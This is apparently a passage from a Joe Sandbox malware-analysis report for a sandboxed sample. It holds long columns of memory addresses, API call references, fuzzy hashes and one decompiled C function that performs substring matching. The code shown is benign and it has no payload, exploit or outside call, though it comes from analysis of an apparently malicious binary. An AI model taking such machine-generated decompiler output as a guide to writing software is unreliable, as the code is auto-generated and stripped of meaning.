                                                          0x100010f0
                                                          0x100010ff
                                                          0x1000110e
                                                          0x10001119
                                                          0x1000111c
                                                          0x1000112b
                                                          0x1000112f
                                                          0x10001131
                                                          0x100011d8
                                                          0x100011de
                                                          0x10001137
                                                          0x10001138
                                                          0x10001138
                                                          0x1000113d
                                                          0x1000113e
                                                          0x10001140
                                                          0x10001143
                                                          0x1000120d
                                                          0x10001210
                                                          0x100011b0
                                                          0x100011b6
                                                          0x100011bf
                                                          0x100011c4
                                                          0x100011c7
                                                          0x00000000
                                                          0x100011c7
                                                          0x10001212
                                                          0x10001214
                                                          0x10001196
                                                          0x1000119d
                                                          0x100011a5
                                                          0x00000000
                                                          0x100011a5
                                                          0x10001161
                                                          0x10001162
                                                          0x1000116a
                                                          0x10001177
                                                          0x1000117f
                                                          0x10001188
                                                          0x1000118d
                                                          0x1000118d
                                                          0x00000000
                                                          0x10001162
                                                          0x10001149
                                                          0x100011df
                                                          0x100011df
                                                          0x100011e6
                                                          0x100011f3
                                                          0x100011f8
                                                          0x100011fb
                                                          0x10001203
                                                          0x10001205
                                                          0x10001205
                                                          0x00000000
                                                          0x100011e6
                                                          0x1000114f
                                                          0x10001152
                                                          0x00000000
                                                          0x00000000
                                                          0x10001158
                                                          0x1000115b
                                                          0x100011ac
                                                          0x00000000
                                                          0x100011ac
                                                          0x1000115d
                                                          0x1000115f
                                                          0x10001192
                                                          0x00000000
                                                          0x10001192
                                                          0x00000000
                                                          0x100011c9
                                                          0x100011c9
                                                          0x100011d3
                                                          0x00000000
                                                          0x100011d7

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.667355155.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000002.00000002.667337465.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667366350.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667376456.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_10000000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405CA3(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                          0x00405cb3
                                                          0x00405cb5
                                                          0x00405cb8
                                                          0x00405ce4
                                                          0x00405cbd
                                                          0x00405cc6
                                                          0x00405ccb
                                                          0x00405cd6
                                                          0x00405cd9
                                                          0x00405cf5
                                                          0x00405cdb
                                                          0x00405ce2
                                                          0x00000000
                                                          0x00405ce2
                                                          0x00405cee
                                                          0x00405cf2
                                                          0x00405cf2
                                                          0x00405cec
                                                          0x00000000

                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                                                          • CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                          • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                                          • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                          • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%